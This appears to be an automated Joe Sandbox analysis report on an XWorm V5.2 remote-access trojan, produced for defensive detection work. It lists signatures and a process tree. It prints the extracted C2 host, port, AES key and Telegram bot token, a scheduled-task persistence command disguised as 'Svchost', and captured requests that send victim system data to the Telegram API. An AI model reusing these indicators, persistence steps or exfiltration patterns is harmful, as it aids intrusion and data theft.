Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
Analysis ID:1387375
MD5:8dcbb40394210dc5287028e66fdbf0c7
SHA1:eb367c12ee4e8338a891b563f0b19204197c2ab9
SHA256:526a3df9f947f4f372d58e8c0065792ab027f06b49fd4f7c705280b199b541a9
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe (PID: 1072 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe MD5: 8DCBB40394210DC5287028E66FDBF0C7)
    • X.exe (PID: 3280 cmdline: "C:\Users\user\AppData\Roaming\X.exe" MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
      • schtasks.exe (PID: 6560 cmdline: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 6768 cmdline: C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • 61c7cdb3196df.exe (PID: 2072 cmdline: "C:\Users\user\AppData\Roaming\61c7cdb3196df.exe" MD5: C0E5B07CBF2D02C54F39CE6AAD676DC7)
  • svchost.exe (PID: 7096 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5096 cmdline: C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 4212 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\Svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Temp\Svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x78b2:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Roaming\X.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\X.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7876:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7913:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7a28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x76b2:$cnc4: POST / HTTP/1.1
            00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x1f08e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x280ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x1f12b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x2816b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x1f240:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x28280:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x1eeca:$cnc4: POST / HTTP/1.1
              • 0x27f0a:$cnc4: POST / HTTP/1.1
              Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe PID: 1072JoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                2.0.X.exe.960000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  2.0.X.exe.960000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    2.0.X.exe.960000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x78b2:$cnc4: POST / HTTP/1.1
                    0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x5c76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x5d13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x5e28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x5ab2:$cnc4: POST / HTTP/1.1
                      Click to see the 8 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetFilename: C:\Users\user\AppData\Local\Temp\Svchost.exe
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\X.exe, ProcessId: 3280, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\X.exe" , ParentImage: C:\Users\user\AppData\Roaming\X.exe, ParentProcessId: 3280, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 6560, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\X.exe" , CommandLine: "C:\Users\user\AppData\Roaming\X.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\X.exe, NewProcessName: C:\Users\user\AppData\Roaming\X.exe, OriginalFileName: C:\Users\user\AppData\Roaming\X.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, ParentProcessId: 1072, ParentProcessName: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\X.exe" , ProcessId: 3280, ProcessName: X.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\X.exe" , ParentImage: C:\Users\user\AppData\Roaming\X.exe, ParentProcessId: 3280, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 6560, ProcessName: schtasks.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7096, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\X.exe" , ParentImage: C:\Users\user\AppData\Roaming\X.exe, ParentProcessId: 3280, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 6560, ProcessName: schtasks.exe
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\X.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
                      Source: eu-central-7075.packetriot.netVirustotal: Detection: 13%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeVirustotal: Detection: 76%Perma Link
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeVirustotal: Detection: 9%Perma Link
                      Source: C:\Users\user\AppData\Roaming\X.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Roaming\X.exeVirustotal: Detection: 76%Perma Link
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeVirustotal: Detection: 72%Perma Link
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Roaming\X.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49784 version: TLS 1.2
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.pdbMZ@ source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Xml.pdbu source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: lib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.pdb#( source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: .pdb. source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\X.PDB7 source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: X.exe, 00000002.00000002.2842784193.000000001BB9D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbexe= source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BB9D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BB3C000.00000004.00000020.00020000.00000000.sdmp, WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Management.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbion= source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.pdb` source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.pdbH source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER1D84.tmp.dmp.18.dr

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: trusting-smoke-90361.pktriot.net
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.9:49706 -> 167.71.56.116:22100
                      Source: global trafficHTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 167.71.56.116 167.71.56.116
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                      Source: svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb(
                      Source: svchost.exe, 00000013.00000002.3878729555.000002A0E2EA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                      Source: svchost.exe, 00000013.00000002.3878556121.000002A0E2E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpose
                      Source: svchost.exe, 00000013.00000002.3876943198.000002A0E1ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
